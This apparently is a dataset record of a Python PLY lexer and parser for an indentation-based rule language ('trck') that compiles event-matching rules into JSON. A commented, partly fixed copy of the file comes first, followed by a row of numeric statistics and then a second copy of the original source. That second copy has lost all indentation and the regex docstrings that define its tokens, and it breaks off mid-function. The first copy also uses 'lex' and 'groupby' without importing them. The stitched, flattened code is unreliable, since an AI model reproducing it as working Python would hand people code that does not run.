from datetime import datetime
import re
class ParseError(Exception):
    """Raised on lexer/parser failures.

    Extra keyword arguments (e.g. ``lineno``, ``lexpos``, ``value``) are
    stored on ``self.info`` so callers can inspect structured details.
    """

    def __init__(self, message, **kwargs):
        # BUGFIX: the original called `super(Exception, self).__init__`,
        # which skips Exception itself in the MRO; bind super() from this
        # class (py2-compatible spelling, as the file supports Python 2).
        super(ParseError, self).__init__(message)
        self.info = kwargs
reserved = set(['after', 'receive', 'yield', 'quit', 'window', 'repeat', 'in', 'foreach', 'to', 'merged', 'results',
'start_timestamp'])
tokens = [
'TIMEDELTA',
'TIMESTAMP', 'STRING', 'NUMBER',
'COMMA',
'WILDCARD', 'ARROW', 'EQ', 'LT', 'GT', 'LTE', 'GTE',
'SCALAR', 'HASH', 'SCALAR_RESULT', 'ARRAY', 'MULTISET', 'HLL',
'ID', 'WS', 'INDENT', 'NEWLINE', 'DEDENT', 'LBRACKET', 'RBRACKET',
'LPAREN', 'RPAREN'
] + [r.upper() for r in reserved]
type_names = {
'ID': 'identifier'
}
# Tokens
# Single-pattern tokens: PLY reads the regex from each `t_<TOKEN>` string.
t_LT = r'<'
t_GT = r'>'
t_LTE = r'<='
t_GTE = r'>='
t_COMMA = r','
t_WILDCARD= r'\*'
t_ARROW = r'->'
t_EQ = r'='
t_LBRACKET = '\['
t_RBRACKET = '\]'
t_LPAREN = '\('
t_RPAREN = '\)'
# Whitespace is handled by the t_ws function rule below, not a string rule.
#t_WS = r'[ \t]+'
def t_TIMEDELTA(t):
    r'\d+(s|m|h|d)'
    # Token rule: a duration literal like "15m". The regex docstring above is
    # significant -- PLY uses it as the token pattern.
    try:
        # Split into (magnitude, unit-suffix), e.g. "15m" -> (15, 'm').
        t.value = int(t.value[:-1]), t.value[-1]
    except ValueError:
        # BUGFIX: the original passed t.value as a second print() argument
        # instead of %-interpolating it, so the literal "%d" was printed.
        print("Integer value too large %s" % (t.value,))
        t.value = 0
    return t
def t_NUMBER(t):
    r'\d+'
    # Token rule: an integer literal. The regex docstring is the PLY pattern.
    try:
        t.value = int(t.value)
    except ValueError:
        # BUGFIX: the original passed t.value as a second print() argument
        # instead of %-interpolating it, so the literal "%d" was printed.
        print("Integer value too large %s" % (t.value,))
        t.value = 0
    return t
def t_TIMESTAMP(t):
    r'\'\d{4}-\d{2}-\d{2}\''
    # Token rule: a quoted ISO date literal ('YYYY-MM-DD'), converted to
    # integer seconds since the Unix epoch.
    try:
        parsed = datetime.strptime(t.value.strip("'"), '%Y-%m-%d')
        epoch = datetime(1970, 1, 1)
        t.value = int((parsed - epoch).total_seconds())
    except ValueError:
        print("Cannot parse datetime", t.value)
        t.value = 0
    return t
def t_ID(t):
    r'[a-zA-Z_][a-zA-Z_0-9]*'
    # Keywords listed in `reserved` are emitted as their own token types
    # (e.g. "after" -> AFTER); everything else is a generic ID.
    if t.value in reserved:
        t.type = t.value.upper()
    else:
        t.type = 'ID'
    return t
# Variable-reference tokens.  Each leading sigil selects a distinct variable
# kind: % scalar, # hash/set, & multiset, ^ HLL sketch, @ array, $ scalar
# result.  The docstrings below are the PLY regexes — do not edit them.
def t_SCALAR(t):
    r'%[a-zA-Z_][a-zA-Z_0-9]*'
    return t
def t_HASH(t):
    r'\#[a-zA-Z_][a-zA-Z_0-9]*'
    return t
def t_MULTISET(t):
    r'&[a-zA-Z_][a-zA-Z_0-9]*'
    return t
def t_HLL(t):
    r'\^[a-zA-Z_][a-zA-Z_0-9]*'
    return t
def t_ARRAY(t):
    r'@[a-zA-Z_][a-zA-Z_0-9]*'
    return t
def t_SCALAR_RESULT(t):
    r'\$[a-zA-Z_][a-zA-Z_0-9]*'
    return t
def t_STRING(t):
    r'("(\\"|[^"])*")|(\'(\\\'|[^\'])*\')'
    # Strip the surrounding quotes; escape sequences inside the literal are
    # kept verbatim (no unescaping is performed here).
    t.value = t.value[1:-1]
    return t
def t_comment(t):
    r"[ ]*--[^\n]*"
    # "--" starts a comment running to end of line; no token is produced.
    pass
def t_ws(t):
    r'[ ]+'
    # Runs of spaces become WS tokens so gen_indents() can measure the
    # leading whitespace of each line.
    t.type = 'WS'
    return t
def t_newline_escape(t):
    r"\\\n"
    # A backslash-newline continues the logical line; swallow it entirely.
    pass
def t_newline(t):
    r'\n'
    t.lexer.lineno += t.value.count("\n")
    t.type = 'NEWLINE'
    # Clearing the value makes a NEWLINE-derived INDENT measure as level 0
    # in indent_level().
    t.value = ''
    return t
#def t_indent(t):
#    r'\n+[ \t]*'
#    t.lexer.lineno += t.value.count("\n")
#    t.type = 'INDENT'
#    return t
def t_error(t):
    # PLY lexer error hook: wrap the failure in a ParseError carrying the
    # position info.  lineno == -1 marks synthetic end-of-input tokens.
    if t.lineno == -1:
        raise ParseError(message="Lexer error: unexpected EOF")
    raise ParseError(
        message="Lexer error at line %s position %s: invalid token %s" % (t.lineno, t.lexpos, t.value),
        lineno=t.lineno,
        lexpos=t.lexpos,
        type=t.type,
        value=t.value)
class IndentLexer:
    """Wraps a PLY lexer, turning leading-whitespace changes into synthetic
    INDENT/NEWLINE/DEDENT tokens (Python-style layout handling).

    NOTE(review): __iter__ builds a *fresh* generator chain over the
    underlying lexer instead of reusing self.gen, so iterating and calling
    token() on the same instance consume the stream independently.  That
    behavior is preserved as-is here.
    """

    def __init__(self, lexer):
        self.lexer = lexer
        self.gen = gen_dedents(gen_indents(skip_begin_newlines(lexer)))

    def input(self, *args, **kwds):
        # Delegate to the wrapped lexer; the generator pipeline picks up the
        # new data lazily on the next token() call.
        self.lexer.input(*args, **kwds)

    def token(self):
        # Bug fix: self.gen.next() is Python 2-only syntax; the builtin
        # next() works on both Python 2.6+ and Python 3.
        try:
            return next(self.gen)
        except StopIteration:
            return None

    def __iter__(self):
        return gen_dedents(gen_indents(skip_begin_newlines(self.lexer)))
def indent_level(v):
    """Return the indent width of *v*: each tab counts as 8 columns and
    newline characters are ignored."""
    expanded = v.replace("\t", " " * 8).replace("\n", "")
    return len(expanded)
def skip_begin_newlines(lexer):
    """Suppress NEWLINE/WS tokens that appear before the first real token,
    then pass everything else through untouched."""
    seen_real_token = False
    for tok in lexer:
        if not seen_real_token and tok.type in ('NEWLINE', 'WS'):
            continue
        seen_real_token = True
        yield tok
def gen_indents(lexer):
    """Insert an INDENT marker (carrying the preceding whitespace) before the
    first real token of every line; WS/NEWLINE tokens themselves are dropped."""
    prev = None            # most recent WS/NEWLINE token seen
    line_started = False   # has the current line produced a real token yet?
    for token in lexer:
        #print token
        if token.type not in ('NEWLINE', 'WS'):
            if not line_started:
                line_started = True
                # First real token of the line: emit an INDENT whose value is
                # the preceding whitespace (measured later by indent_level).
                if prev :
                    yield _new_token('INDENT', token.lineno, value=prev.value)
            yield token
            prev = token
        elif token.type == 'NEWLINE':
            line_started = False
            prev = token
        elif token.type == 'WS':
            prev = token
def gen_dedents(lexer):
    """Convert the INDENT markers from gen_indents() into proper
    NEWLINE/INDENT/DEDENT tokens by tracking a stack of indent widths
    (the same scheme as Python's own tokenizer)."""
    stack = [0]  # currently open indentation levels; 0 = column zero
    for token in lexer:
        if token.type != 'INDENT':
            yield token
        else:
            level = indent_level(token.value)
            if level == stack[-1]:
                # Same level as before: the line is a sibling statement.
                yield _new_token('NEWLINE', token.lineno)
                continue
            elif level < stack[-1]:
                # Shallower: pop until we reach an enclosing level, emitting
                # one DEDENT per block being closed.
                while stack[-1] > level:
                    stack_level = stack.pop()
                    if stack_level > 0:
                        yield _new_token('DEDENT', token.lineno)
                if stack[-1] != level:
                    raise ParseError("Indent level doesn't match earlier at %s: stack %s now %s" % (token.lineno, stack, level))
            elif level > stack[-1]:
                # Deeper: open a new block.
                stack.append(level)
                yield _new_token('INDENT', token.lineno)
    # End of input: close any blocks still open (lineno -1 marks synthetic
    # tokens, recognized by t_error/p_error as EOF).
    while stack:
        stack_level = stack.pop()
        if stack_level > 0:
            yield _new_token('DEDENT', -1)
def _new_token(type, lineno, value=None):
    """Build a synthetic LexToken (INDENT/DEDENT/NEWLINE) at *lineno*.

    lexpos is set to -100 to mark the token as synthetic (it has no real
    source position).
    """
    tok = lex.LexToken()
    tok.type = type
    tok.value = value
    tok.lineno = lineno
    tok.lexpos = -100
    return tok
def timedelta_to_seconds(n, unit):
    """Convert a (count, unit) TIMEDELTA to seconds.

    *unit* is one of 's', 'm', 'h' or 'd'; anything else raises ParseError.
    """
    factors = {'s': 1, 'm': 60, 'h': 60 * 60, 'd': 60 * 60 * 24}
    if unit not in factors:
        raise ParseError("unknown time unit: %s" % unit)
    return n * factors[unit]
def p_program(p):
    """program : foreach_expr INDENT rules DEDENT
               | rules"""
    # A program is a rule list, optionally wrapped in a foreach header that
    # groups results by the foreach variables.
    if len(p) > 2:
        p[0] = {'rules' : p[3], 'groupby' : p[1]}
    else:
        p[0] = {'rules' : p[1]}
def p_foreach_expr(p):
    """ foreach_expr : FOREACH vars IN ARRAY
                     | FOREACH vars IN ARRAY MERGED
                     | FOREACH vars IN ARRAY MERGED RESULTS """
    # Explicit form: "foreach %a, #b in @values [merged [results]]".
    p[0] = {'vars': p[2], 'values': p[4], "lineno": p.lineno(2)}
    if len(p) > 5:
        p[0]['merge_results'] = True
def p_foreach_expr_imp(p):
    """ foreach_expr : FOREACH SCALAR
                     | FOREACH SCALAR MERGED
                     | FOREACH SCALAR MERGED RESULTS """
    # Implicit form: a single scalar variable, no explicit value array.
    p[0] = {'vars': [p[2]], "lineno": p.lineno(2)}
    if len(p) > 3:
        p[0]['merge_results'] = True
def p_vars(p):
    """vars : vars COMMA var
            | var """
    # Left-recursive, comma-separated list of foreach variables.
    if len(p) > 2:
        p[0] = p[1] + [p[3]]
    else:
        p[0] = [p[1]]
def p_var(p):
    """ var : HASH
            | SCALAR
    """
    p[0] = p[1]
def p_rules(p):
    """rules : rules rule
             | rule """
    # Left-recursive list of named rules.
    if len(p) > 2:
        p[0] = p[1] + [p[2]]
    else:
        p[0] = [p[1]]
def p_rule(p):
    """ rule : ID ARROW INDENT rule_body DEDENT
    """
    # Attach the rule's name to the body dict produced by rule_body.
    # NOTE(review): dict.items() + list only works on Python 2, where
    # items() returns a list; under Python 3 this raises TypeError.
    p[0] = {k : v for k, v in p[4].items() + [('name', p[1])]}
def p_rule_body(p):
    """ rule_body : window_stmt
                  | receive_stmt
    """
    p[0] = p[1]
def p_windowed_rule(p):
    """ window_stmt : WINDOW INDENT rules DEDENT AFTER TIMEDELTA ARROW actions
    """
    # Nested rules plus a timeout: 'window' is the duration in seconds,
    # 'after' the actions to run when it expires.
    p[0] = {'rules' : p[3], 'after' : p[8], 'window' : timedelta_to_seconds(*p[6])}
def p_receive_rule(p):
    """ receive_stmt : RECEIVE INDENT match_clauses DEDENT
    """
    p[0] = {'clauses' : p[3]}
def p_receive_rule2(p):
    """ receive_stmt : RECEIVE INDENT match_clauses DEDENT AFTER TIMEDELTA ARROW actions """
    # receive with an explicit timeout window and its 'after' actions.
    p[0] = {'clauses' : p[3], 'window' : timedelta_to_seconds(*p[6]), 'after' : p[8] }
def p_receive_rule3(p):
    """ receive_stmt : RECEIVE INDENT match_clauses DEDENT AFTER ARROW actions """
    # receive with an 'after' handler but no explicit window duration.
    p[0] = {'clauses' : p[3], 'after' : p[7] }
def p_match_clauses(p):
    """match_clauses : match_clauses NEWLINE match_clause
                     | match_clause """
    if len(p) > 2:
        p[0] = p[1] + [p[3]]
    else:
        p[0] = [p[1]]
def p_match_clause(p):
    """ match_clause : conditions ARROW actions """
    # NOTE(review): Python 2-only list + dict_items concatenation (see p_rule).
    p[0] = {k:v for k, v in [("attrs", p[1]), ("lineno", p.lineno(2))] + p[3].items()}
def p_match_clause2(p):
    """ match_clause : WILDCARD ARROW actions """
    # "*" matches any event: empty attribute-condition dict.
    p[0] = {k:v for k, v in [("attrs", {}), ("lineno", p.lineno(2))] + p[3].items()}
# concatitems([[1],[2]]) -> [1,2]
# concatitems([1,[2]]) -> [1,2]
# concatitems([1]) -> [1]
def concatitems(items):
    """Flatten grouped (key, value) pairs into a single value list.

    List values are spliced in, scalar values appended — e.g.
    [(k, [1]), (k, 2)] -> [1, 2].  *items* must be non-empty.
    """
    assert items
    flattened = []
    for _key, value in items:
        if isinstance(value, list):
            flattened.extend(value)
        else:
            flattened.append(value)
    return flattened
def p_conditions(p):
    """conditions : conditions COMMA condition
                  | condition """
    # Merge per-field condition dicts; multiple conditions on the same field
    # are concatenated into one list (see concatitems).
    # NOTE(review): dict.items() + dict.items() is Python 2-only.
    if len(p) > 2:
        p[0] = {k: concatitems(v) for k, v in groupby(sorted(p[1].items() + p[3].items()),
                                                      key=lambda x: x[0])}
    else:
        p[0] = p[1]
def p_condition(p):
    """ condition : ID EQ STRING
                  | ID EQ SCALAR """
    # Equality conditions store the bare value (no operator prefix).
    p[0] = {p[1]: [p[3]]}
def p_condition_hash(p):
    """ condition : ID IN HASH"""
    p[0] = {p[1]: [p[3]]}
def p_condition_ts(p):
    """ condition : ID LT TIMESTAMP
                  | ID GT TIMESTAMP
                  | ID GTE TIMESTAMP
                  | ID LTE TIMESTAMP """
    # Comparison conditions are stored as "<op><value>" strings; parse_expr()
    # later splits them back apart.
    p[0] = {p[1]: [p[2] + str(p[3])]}
def p_condition_ts_2(p):
    """ condition : ID LT NUMBER
                  | ID GT NUMBER
                  | ID GTE NUMBER
                  | ID LTE NUMBER """
    p[0] = {p[1]: [p[2] + str(p[3])]}
def p_condition_ts_3(p):
    """ condition : ID LT SCALAR
                  | ID GT SCALAR
                  | ID GTE SCALAR
                  | ID LTE SCALAR """
    p[0] = {p[1]: [p[2] + str(p[3])]}
def p_actions(p):
    """ actions : yields COMMA transition """
    p[0] = {'yield' : p[1], 'action' : p[3]}
def p_actions_2(p):
    """ actions : yields """
    p[0] = {'yield' : p[1]}
def p_actions_3(p):
    """ actions : transition """
    p[0] = {'action' : p[1]}
def p_action_yields(p):
    """ yields : yields COMMA YIELD yield_var
               | YIELD yield_var """
    if len(p) == 3:
        p[0] = [p[2]]
    else:
        p[0] = p[1] + [p[4]]
def p_action_yield_var(p):
    """ yield_var : SCALAR_RESULT
    """
    # "yield $result" with no source expression.
    p[0] = {'dst': p[1]}
def p_action_yield_set(p):
    """ yield_var : ID TO HASH """
    # "yield field to #set": a single-field source.
    p[0] = {'dst': p[3], 'src': [{'_k': 'field', 'name': p[1]}]}
def p_action_yield_multiset(p):
    """ yield_var : ID TO MULTISET """
    p[0] = {'dst': p[3], 'src': [{'_k': 'field', 'name': p[1]}]}
def p_action_yield_hll(p):
    """ yield_var : ID TO HLL """
    p[0] = {'dst': p[3], 'src': [{'_k': 'field', 'name': p[1]}]}
def p_action_yield_set_tuple(p):
    """ yield_var : ids TO HASH """
    # Tuple form: several yieldables into one destination.
    p[0] = {'dst': p[3], 'src': p[1]}
def p_action_yield_multiset_tuple(p):
    """ yield_var : ids TO MULTISET """
    p[0] = {'dst': p[3], 'src': p[1]}
def p_action_yield_hll_tuple(p):
    """ yield_var : ids TO HLL """
    p[0] = {'dst': p[3], 'src': p[1]}
def p_ids(p):
    """ids : ids COMMA yieldable
           | yieldable """
    if len(p) > 2:
        p[0] = p[1] + [p[3]]
    else:
        p[0] = [p[1]]
def p_yieldable(p):
    """ yieldable : ID """
    # A bare identifier yields the event field of that name.
    p[0] = {'_k': 'field', 'name': p[1]}
def p_yieldable_start_ts(p):
    """ yieldable : START_TIMESTAMP """
    # Reference to the current window's start timestamp.
    p[0] = {'_k': 'window_ref'}
def p_yieldable_fcall(p):
    """ yieldable : fcall """
    p[0] = p[1]
def p_yieldable_windowref(p):
    """ yieldable : START_TIMESTAMP LBRACKET ID RBRACKET """
    # start_timestamp[state]: the window start of a specific named state.
    p[0] = {'_k': 'window_ref', 'ref': p[3]}
def p_fcall(p):
    """ fcall : ID LPAREN arglist RPAREN """
    p[0] = {'_k': 'fcall',
            'name': p[1],
            'args': p[3]}
def p_arglist(p):
    """ arglist : arglist COMMA arg
                | arg """
    if len(p) == 2:
        p[0] = [p[1]]
    elif len(p) == 4:
        p[0] = p[1] + [p[3]]
def p_arg_id(p):
    """ arg : ID """
    p[0] = {'_k': 'field', 'name': p[1]}
def p_arg_scalar(p):
    """ arg : SCALAR """
    # %variables passed as function arguments become runtime parameters.
    p[0] = {'_k': 'param', 'name': p[1]}
def p_arg_fcall(p):
    """ arg : fcall """
    p[0] = p[1]
def p_arg_ts(p):
    """ arg : START_TIMESTAMP LBRACKET ID RBRACKET """
    p[0] = {'_k': 'window_ref', 'ref': p[3]}
def p_arg_literal(p):
    """ arg : STRING
            | NUMBER """
    p[0] = {'_k': 'literal', 'value': p[1]}
def p_transition(p):
    """ transition : ID """
    # Transition to a named rule; rewritten to numeric restart actions by
    # convert_transitions().
    p[0] = p[1]
def p_transition2(p):
    """ transition : QUIT
                   | REPEAT"""
    p[0] = p[1]
def p_error(p):
    # PLY parser error hook.  p is None at end of input in some PLY
    # versions; lineno -1 marks the synthetic EOF DEDENT tokens.
    if p is None or p.lineno == -1:
        raise ParseError(message="Syntax error: unexpected EOF")
    else:
        raise ParseError(message="Syntax error at line %s position %s: %s %s" % (p.lineno, p.lexpos, type_names.get(p.type, p.type), p.value),
                         lineno=p.lineno,
                         lexpos=p.lexpos,
                         type=p.type,
                         value=p.value)
# Convert a structure with nested window() statements to a flat list of rules
# Replace transitions with numeric labels. Use restart-from-next(%label)
# in rule matcher clauses, and restart-from-here(%label) in after actions.
def assign_numeric_labels(rules, n=0):
    """Number every rule depth-first, storing the index under 'n'.

    A rule that contains nested rules additionally records 'outer': the
    first label *after* its nested block.  Returns the next unused label.
    """
    for rule in rules:
        rule['n'] = n
        n += 1
        if 'rules' in rule:
            n = assign_numeric_labels(rule['rules'], n)
            rule['outer'] = n
    return n
def flatten_rules(rules):
    """Yield rules in pre-order, deleting each rule's nested 'rules' key
    before recursing into the children (mutates the rule dicts)."""
    for rule in rules:
        children = rule.get('rules')
        if not children:
            yield rule
            continue
        del rule['rules']
        yield rule
        for descendant in flatten_rules(children):
            yield descendant
# Actions that are interpreted directly by the runtime, not rewritten.
reserved_actions = ['repeat', 'quit']
def convert_transitions(rules):
    """Rewrite symbolic state names into numeric restart actions.

    'after' handlers restart from the target rule itself
    (restart-from-here(n)); match-clause transitions restart from the rule
    *after* the current one (restart-from-next(n)).  'repeat' and 'quit'
    pass through unchanged.  Raises ParseError for unknown labels.
    """
    numeric = {r['name'] : r['n'] for r in rules}
    for r in rules:
        if 'after' in r:
            if 'action' in r['after']:
                action = r['after']['action']
                if action not in reserved_actions:
                    r['after']['action'] = 'restart-from-here(%d)' % numeric[action]
            else:
                # No explicit action on the after-handler: plain restart.
                r['after']['action'] = 'restart-from-here'
        for c in r.get('clauses', []):
            if 'action' in c:
                action = c['action']
                if action not in reserved_actions:
                    if action not in numeric:
                        raise ParseError(message='Label not found: %s' % action, lineno=c.get('lineno'), lexpos=c.get('lexpos'))
                    c['action'] = 'restart-from-next(%d)' % numeric[action]
            else:
                # A clause without an explicit transition is only legal in
                # the first rule, where it means "repeat".
                if r['n'] >= 1:
                    raise ParseError(message='Consider adding repeat here', lineno=c.get('lineno'), lexpos=c.get('lexpos'))
                else:
                    c['action'] = 'repeat'
import ply.yacc as yacc
# Module-level parser/lexer singletons used by compile_tr() and the CLI.
parser = yacc.yacc()
# Build the lexer
lexer = lex.lex()
lexer = IndentLexer(lexer)
import sys
import json
# Classification tags returned by parse_expr() below.
EXPR_TYPE_CONST = 'const'
EXPR_TYPE_IN_VAR = 'in_var'
EXPR_TYPE_TIMESTAMP_OP_VAR = 'timestamp_op_var'
EXPR_TYPE_TIMESTAMP_OP_CONST = 'timestamp_op_const'
def is_variable(n):
    """True when *n* is a trck variable reference (leading #, &, %, $ or @)."""
    if n == '':
        return False
    return n[0] in '#&%$@'
def parse_expr(expr_string):
    """Classify a stored condition expression string.

    Returns (EXPR_TYPE_*, payload): comparison expressions such as ">=100"
    yield an (op, rhs) payload, everything else a 1-tuple of the value.
    """
    match = re.match('((>=)|(<=)|(==)|(<)|(>))(.+)', expr_string)
    if match is None:
        if is_variable(expr_string):
            return (EXPR_TYPE_IN_VAR, (expr_string,))
        return (EXPR_TYPE_CONST, (expr_string,))
    op, rhs = match.group(1), match.group(7)
    if is_variable(rhs):
        return (EXPR_TYPE_TIMESTAMP_OP_VAR, (op, rhs))
    return (EXPR_TYPE_TIMESTAMP_OP_CONST, (op, rhs))
def get_var_fields(rules):
    """Map each variable referenced in match conditions to the field name it
    constrains (both bare `field in #var` and `field <op> %var` forms)."""
    mapping = {}
    for rule in rules:
        for clause in rule.get('clauses', []):
            for field, exprs in clause.get('attrs', {}).items():
                for expr in exprs:
                    kind, payload = parse_expr(expr)
                    if kind == EXPR_TYPE_IN_VAR:
                        mapping[payload[0]] = field
                    elif kind == EXPR_TYPE_TIMESTAMP_OP_VAR:
                        mapping[payload[1]] = field
    return mapping
def compile_tr(text):
    """Compile trck source *text* into the flat, JSON-serializable rule
    structure: labels assigned, nesting flattened, transitions numeric.

    Uses the module-level parser/lexer singletons, so calls share state.
    """
    lexer.input(text)
    result = parser.parse(lexer = lexer)
    assign_numeric_labels(result['rules'])
    flat_rules = list(flatten_rules(result['rules']))
    convert_transitions(flat_rules)
    if 'groupby' in result:
        return { 'rules' : flat_rules, 'groupby': result['groupby']}
    else:
        return {'rules' : flat_rules}
def syntax_check(text):
    """Parse *text* and return [] on success, or a one-element list holding
    the error message and its structured info dict on ParseError."""
    try:
        # Fresh parser/lexer locals shadow the module-level singletons so a
        # failed check does not disturb shared state.
        parser = yacc.yacc()
        # Build the lexer
        lexer = lex.lex()
        lexer = IndentLexer(lexer)
        sys.stderr.write("text %s\n" % text)
        lexer.input(text)
        result = parser.parse(lexer=lexer)
        assign_numeric_labels(result['rules'])
        flat_rules = list(flatten_rules(result['rules']))
        convert_transitions(flat_rules)
        return []
    except ParseError as e:
        # NOTE(review): e.message exists on Python 2 exceptions only; under
        # Python 3 this line raises AttributeError — confirm the target
        # interpreter before relying on this path.
        sys.stderr.write("exception %s %s\n" % (e.message, lexer.lexer.lineno))
        return [{'message' : e.message, 'info' : e.info}]
if __name__ == '__main__':
    # CLI: with no arguments, compile stdin to JSON on stdout;
    # "lex" dumps the (indent-processed) token stream; "gen" is a stub.
    if len(sys.argv) == 1:
        flat_rules = compile_tr(sys.stdin.read())
        print(json.dumps(flat_rules))
    elif sys.argv[1] == 'lex':
        lexer.input(sys.stdin.read())
        for t in lexer:
            print(t.lineno, t.type, t.value)
    elif sys.argv[1] == 'gen':
        pass
| 26.773354 | 142 | 0.517531 | from __future__ import print_function
import ply.lex as lex
from itertools import groupby
from datetime import datetime
import re
class ParseError(Exception):
def __init__(self, message, **kwargs):
super(Exception, self).__init__(message)
self.info = kwargs
reserved = set(['after', 'receive', 'yield', 'quit', 'window', 'repeat', 'in', 'foreach', 'to', 'merged', 'results',
'start_timestamp'])
tokens = [
'TIMEDELTA',
'TIMESTAMP', 'STRING', 'NUMBER',
'COMMA',
'WILDCARD', 'ARROW', 'EQ', 'LT', 'GT', 'LTE', 'GTE',
'SCALAR', 'HASH', 'SCALAR_RESULT', 'ARRAY', 'MULTISET', 'HLL',
'ID', 'WS', 'INDENT', 'NEWLINE', 'DEDENT', 'LBRACKET', 'RBRACKET',
'LPAREN', 'RPAREN'
] + [r.upper() for r in reserved]
type_names = {
'ID': 'identifier'
}
t_LT = r'<'
t_GT = r'>'
t_LTE = r'<='
t_GTE = r'>='
t_COMMA = r','
t_WILDCARD= r'\*'
t_ARROW = r'->'
t_EQ = r'='
t_LBRACKET = '\['
t_RBRACKET = '\]'
t_LPAREN = '\('
t_RPAREN = '\)'
def t_TIMEDELTA(t):
try:
t.value = int(t.value[:-1]), t.value[-1]
except ValueError:
print("Integer value too large %d", t.value)
t.value = 0
return t
def t_NUMBER(t):
try:
t.value = int(t.value)
except ValueError:
print("Integer value too large %d", t.value)
t.value = 0
return t
def t_TIMESTAMP(t):
try:
t.value = int((datetime.strptime(t.value.strip("'"), '%Y-%m-%d') - datetime(1970, 1, 1)).total_seconds())
except ValueError:
print("Cannot parse datetime", t.value)
t.value = 0
return t
def t_ID(t):
t.type = t.value.upper() if t.value in reserved else 'ID'
return t
def t_SCALAR(t):
return t
def t_HASH(t):
return t
def t_MULTISET(t):
return t
def t_HLL(t):
return t
def t_ARRAY(t):
return t
def t_SCALAR_RESULT(t):
return t
def t_STRING(t):
t.value = t.value[1:-1]
return t
def t_comment(t):
pass
def t_ws(t):
t.type = 'WS'
return t
def t_newline_escape(t):
pass
def t_newline(t):
t.lexer.lineno += t.value.count("\n")
t.type = 'NEWLINE'
t.value = ''
return t
#def t_indent(t):
# r'\n+[ \t]*'
# t.lexer.lineno += t.value.count("\n")
# t.type = 'INDENT'
# return t
def t_error(t):
if t.lineno == -1:
raise ParseError(message="Lexer error: unexpected EOF")
else:
raise ParseError(message="Lexer error at line %s position %s: invalid token %s" % (t.lineno, t.lexpos, t.value),
lineno=t.lineno,
lexpos=t.lexpos,
type=t.type,
value=t.value)
class IndentLexer:
def __init__(self, lexer):
self.lexer = lexer
self.gen = gen_dedents(gen_indents(skip_begin_newlines(lexer)))
def input(self, *args, **kwds):
self.lexer.input(*args, **kwds)
def token(self):
try:
return self.gen.next()
except StopIteration:
return None
def __iter__(self):
return gen_dedents(gen_indents(skip_begin_newlines(self.lexer)))
def indent_level(v):
spaces = v.replace("\t", " ").replace("\n", "")
return len(spaces)
def skip_begin_newlines(lexer):
program_started = False
for token in lexer:
if program_started:
yield token
else:
if token.type not in ('NEWLINE', 'WS'):
program_started = True
yield token
def gen_indents(lexer):
prev = None
line_started = False
for token in lexer:
#print token
if token.type not in ('NEWLINE', 'WS'):
if not line_started:
line_started = True
if prev :
yield _new_token('INDENT', token.lineno, value=prev.value)
yield token
prev = token
elif token.type == 'NEWLINE':
line_started = False
prev = token
elif token.type == 'WS':
prev = token
def gen_dedents(lexer):
stack = [0]
for token in lexer:
if token.type != 'INDENT':
yield token
else:
level = indent_level(token.value)
if level == stack[-1]:
yield _new_token('NEWLINE', token.lineno)
continue
elif level < stack[-1]:
while stack[-1] > level:
stack_level = stack.pop()
if stack_level > 0:
yield _new_token('DEDENT', token.lineno)
if stack[-1] != level:
raise ParseError("Indent level doesn't match earlier at %s: stack %s now %s" % (token.lineno, stack, level))
elif level > stack[-1]:
stack.append(level)
yield _new_token('INDENT', token.lineno)
while stack:
stack_level = stack.pop()
if stack_level > 0:
yield _new_token('DEDENT', -1)
def _new_token(type, lineno, value=None):
tok = lex.LexToken()
tok.type = type
tok.lineno = lineno
tok.value = value
tok.lexpos = -100
return tok
def timedelta_to_seconds(n, unit):
if unit == 's':
return n
elif unit == 'm':
return n * 60
elif unit == 'h':
return n * 60 * 60
elif unit == 'd':
return n * 60 * 60 * 24
else:
raise ParseError("unknown time unit: %s" % unit)
def p_program(p):
if len(p) > 2:
p[0] = {'rules' : p[3], 'groupby' : p[1]}
else:
p[0] = {'rules' : p[1]}
def p_foreach_expr(p):
p[0] = {'vars': p[2], 'values': p[4], "lineno": p.lineno(2)}
if len(p) > 5:
p[0]['merge_results'] = True
def p_foreach_expr_imp(p):
p[0] = {'vars': [p[2]], "lineno": p.lineno(2)}
if len(p) > 3:
p[0]['merge_results'] = True
def p_vars(p):
if len(p) > 2:
p[0] = p[1] + [p[3]]
else:
p[0] = [p[1]]
def p_var(p):
p[0] = p[1]
def p_rules(p):
if len(p) > 2:
p[0] = p[1] + [p[2]]
else:
p[0] = [p[1]]
def p_rule(p):
p[0] = {k : v for k, v in p[4].items() + [('name', p[1])]}
def p_rule_body(p):
p[0] = p[1]
def p_windowed_rule(p):
p[0] = {'rules' : p[3], 'after' : p[8], 'window' : timedelta_to_seconds(*p[6])}
def p_receive_rule(p):
p[0] = {'clauses' : p[3]}
def p_receive_rule2(p):
p[0] = {'clauses' : p[3], 'window' : timedelta_to_seconds(*p[6]), 'after' : p[8] }
def p_receive_rule3(p):
p[0] = {'clauses' : p[3], 'after' : p[7] }
def p_match_clauses(p):
if len(p) > 2:
p[0] = p[1] + [p[3]]
else:
p[0] = [p[1]]
def p_match_clause(p):
p[0] = {k:v for k, v in [("attrs", p[1]), ("lineno", p.lineno(2))] + p[3].items()}
def p_match_clause2(p):
p[0] = {k:v for k, v in [("attrs", {}), ("lineno", p.lineno(2))] + p[3].items()}
def concatitems(items):
assert(items)
res = []
for k, v in items:
if isinstance(v, list):
res.extend(v)
else:
res.append(v)
return res
def p_conditions(p):
if len(p) > 2:
p[0] = {k: concatitems(v) for k, v in groupby(sorted(p[1].items() + p[3].items()),
key=lambda x: x[0])}
else:
p[0] = p[1]
def p_condition(p):
p[0] = {p[1]: [p[3]]}
def p_condition_hash(p):
p[0] = {p[1]: [p[3]]}
def p_condition_ts(p):
p[0] = {p[1]: [p[2] + str(p[3])]}
def p_condition_ts_2(p):
p[0] = {p[1]: [p[2] + str(p[3])]}
def p_condition_ts_3(p):
p[0] = {p[1]: [p[2] + str(p[3])]}
def p_actions(p):
p[0] = {'yield' : p[1], 'action' : p[3]}
def p_actions_2(p):
p[0] = {'yield' : p[1]}
def p_actions_3(p):
p[0] = {'action' : p[1]}
def p_action_yields(p):
if len(p) == 3:
p[0] = [p[2]]
else:
p[0] = p[1] + [p[4]]
def p_action_yield_var(p):
p[0] = {'dst': p[1]}
def p_action_yield_set(p):
p[0] = {'dst': p[3], 'src': [{'_k': 'field', 'name': p[1]}]}
def p_action_yield_multiset(p):
p[0] = {'dst': p[3], 'src': [{'_k': 'field', 'name': p[1]}]}
def p_action_yield_hll(p):
p[0] = {'dst': p[3], 'src': [{'_k': 'field', 'name': p[1]}]}
def p_action_yield_set_tuple(p):
